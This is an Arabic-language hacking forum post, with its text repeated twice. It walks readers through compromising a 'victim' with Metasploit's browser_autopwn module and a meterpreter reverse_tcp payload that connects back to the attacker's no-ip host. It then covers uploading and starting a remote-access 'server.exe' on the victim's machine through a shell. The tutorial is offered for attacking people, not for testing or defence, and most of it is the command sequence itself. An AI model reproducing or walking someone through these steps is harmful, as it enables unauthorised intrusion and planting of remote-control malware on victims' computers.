MR.NEWMOON
02-11-2013, 07:59 PM
سينقسم الشرح على قسمين :
القسم الاول : اختراق الضحية
القسم الثانى : رفع الباتش فى جهاز الضحية و تشغيله
نبدآ بسم الله
لتحميل اخر اصدار من البرنامج من موقعه الرسمى
http://www.metasploit.com/download
اولآ : هتفتح الميتا و تكتب فية الامر دا
search autopw
بعد كدا هتكتب الامر دا
use auxiliary/server/browser_autopwn
بعد كدا نكتب امر استعراض متطلبات الثغرة
show options
بعد كدا نختار البايلود بالامر التالى
set payload windows/meterpreter/reverse_tcp
بعد كدا نكتب set LHOST xxxxx.no-ip.org
بدل xxxxx حط النو اى بى بتاعك او الاى بى الخارجى لك
بعد كدا نكتب
set uripath /
بعد كدا
exploit
ملحوظة : الاستغلال بياخد وقت حسب سرعة النت عندك
بعدين بيديك لينك مكتوب فية اسم النو اى بى بتاعك او الاى بى الخارجى الى انتا كتبتو فى LHOST
و جمبى بورت 8080 بتدى الرابط للضحية و بيتم الاختراق
طيب ننتقل للجزء الثانى من الشرح و هو رفع الباتش فى جهاز الضحية
الاول نكتب الامر sessions -i 1
ثم نكتب الامر
upload /user/Desktop/server.exe c:\
مكان user اعملو حسب اسم حساب الدخول فى الويندوز عندك
و انصحك تحط السيرفر على الديسك توب
بعدين نكتب الامر
shell
للدخول للدوس عند الضحيه
وبعد كدا هتدخل للمكان الي رفعت فيه سيرفرك انا هنا حددت السي
c:\
وتكتب الامر
start server.exe
هتلاقي التبليغ وصلك
و الى هنا انتهى الشرح
اهداء الي الاعضاء الكرام نرجو ان ينال عملنا اعجابكم كان معكم
MR.NEWMOON.HACKED
القسم الاول : اختراق الضحية
القسم الثانى : رفع الباتش فى جهاز الضحية و تشغيله
نبدآ بسم الله
لتحميل اخر اصدار من البرنامج من موقعه الرسمى
http://www.metasploit.com/download
اولآ : هتفتح الميتا و تكتب فية الامر دا
search autopw
بعد كدا هتكتب الامر دا
use auxiliary/server/browser_autopwn
بعد كدا نكتب امر استعراض متطلبات الثغرة
show options
بعد كدا نختار البايلود بالامر التالى
set payload windows/meterpreter/reverse_tcp
بعد كدا نكتب set LHOST xxxxx.no-ip.org
بدل xxxxx حط النو اى بى بتاعك او الاى بى الخارجى لك
بعد كدا نكتب
set uripath /
بعد كدا
exploit
ملحوظة : الاستغلال بياخد وقت حسب سرعة النت عندك
بعدين بيديك لينك مكتوب فية اسم النو اى بى بتاعك او الاى بى الخارجى الى انتا كتبتو فى LHOST
و جمبى بورت 8080 بتدى الرابط للضحية و بيتم الاختراق
طيب ننتقل للجزء الثانى من الشرح و هو رفع الباتش فى جهاز الضحية
الاول نكتب الامر sessions -i 1
ثم نكتب الامر
upload /user/Desktop/server.exe c:\
مكان user اعملو حسب اسم حساب الدخول فى الويندوز عندك
و انصحك تحط السيرفر على الديسك توب
بعدين نكتب الامر
shell
للدخول للدوس عند الضحيه
وبعد كدا هتدخل للمكان الي رفعت فيه سيرفرك انا هنا حددت السي
c:\
وتكتب الامر
start server.exe
هتلاقي التبليغ وصلك
و الى هنا انتهى الشرح
اهداء الي الاعضاء الكرام نرجو ان ينال عملنا اعجابكم كان معكم
MR.NEWMOON.HACKED